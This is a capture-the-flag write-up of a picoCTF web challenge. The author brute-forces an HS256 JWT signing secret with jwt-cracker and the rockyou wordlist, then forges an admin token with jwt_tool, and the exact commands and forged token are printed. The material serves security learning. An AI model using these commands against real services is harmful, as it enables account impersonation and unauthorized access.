📊 Challenge Overview

Category	Details	Additional Info
🏆 Event	PicoGym	Event Link
🔰 Category	Web	🌐
💎 Points	500	Out of 500 total
⭐ Difficulty	🟡 Medium	Personal Rating: 3/10
👤 Author	John Hammond	Profile
🎮 Solves (At the time of flag submission)	5.847	solve rate
📅 Date	21-02-2025	PicoGym
🦾 Solved By	mH4ck3r0n3	Team:

📝 Challenge Information

Check the admin scratchpad! https://jupiter.challenges.picoctf.org/problem/63090/ or http://jupiter.challenges.picoctf.org:63090

🎯 Challenge Files & Infrastructure

Provided Files

1	Files: None

🔍 Initial Analysis

First Steps

Initially, the website appears as follows:

Trying to inspect the JWT with https://jwt.io, I discovered that the HS256 algorithm is used, which is vulnerable to brute-forcing the secret key with which the jwt is signed:

As soon as we find this type of algorithm, the first thing to try is using jwt-cracker with rockyou.txt to attempt cracking the secret key, so let’s proceed with the exploitation.

🔬 Vulnerability Analysis

Potential Vulnerabilities

• JWT Secret Brute-Forcing

🎯 Solution Path

Exploitation Steps

Initial setup

As mentioned in the analysis phase, I will try to crack the secret key of the previously found JWT:

1	jwt-cracker -t eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoibUg0Y2szcjBuMyJ9.xQn4fQhEqxtvBjnOL0WYt11H1jJUZ6bF3kY24qaZtLg -d /usr/share/wordlists/rockyou.txt

As we can see, the cracking was successful and the key ilovepico was found. We can now use this key to make any modifications we want to the JWT and then sign it with it.

Exploitation

Since we need to access as the admin user, we must modify the previously extracted JWT payload to {"user":"admin"} and sign the JWT with the key we previously found (ilovepico). We can do this in different ways, for example, by writing a Python script using the jwt library, or we can do it directly via jwt-tools from the CLI:

1	python3 /home/mh4ck3r0n3/Tools/Web/jwt_tool/jwt_tool.py "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoibUg0Y2szcjBuMyJ9.xQn4fQhEqxtvBjnOL0WYt11H1jJUZ6bF3kY24qaZtLg" -S hs256 -I -pc user -pv admin -p "ilovepico"

(for installation: jwt-tools). As we can see, it returns the forged token:

1	eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4ifQ.gtqDl4jVDvNbEe_JYEZTN19Vx6X9NNZtRVbKPBkhO-s

Now, all that’s left is to replace the old JWT value in the cookie using ChromeDevTools, for example, and refresh the page (F5) to “save the changes”. This way, I obtained the flag.

Flag capture

🛠️ Exploitation Process

Approach

The automatic exploit takes a wordlist.txt argument and performs cracking by trying all the keys in the wordlist. As soon as it finds the valid key, it forges the token with user=admin and makes a request with the forged token, extracting the flag from the response using a regex.

•  Exploit

🚩 Flag Capture

Flag

Proof of Execution

Screenshot of successful exploitation

🔧 Tools Used

Tool	Purpose
Python	Exploit
Jwt-Cracker	JWT Secret Cracking

💡 Key Learnings

New Knowledge

I learned that the key of the HS256 algorithm in JWT can be brute-forced.

Time Optimization

When facing a challenge with a JWT using the HS256 algorithm, we can try to brute-force the key right away, perhaps using a wordlist like rockyou.txt with jwt-cracker. If this method doesn’t work, we can try using the none algorithm as done in the JAuth challenge.

Skills Improved

• Binary Exploitation
• Reverse Engineering
• Web Exploitation
• Cryptography
• Forensics
• OSINT
• Miscellaneous

📚 References & Resources

Learning Resources

• https://auth0.com/blog/brute-forcing-hs256-is-possible-the-importance-of-using-strong-keys-to-sign-jwts/
• https://github.com/ticarpi/jwt_tool

📊 Final Statistics

Created: 21-02-2025 • Last Modified: 21-02-2025 *Author: mH4ck3r0n3 • Team: *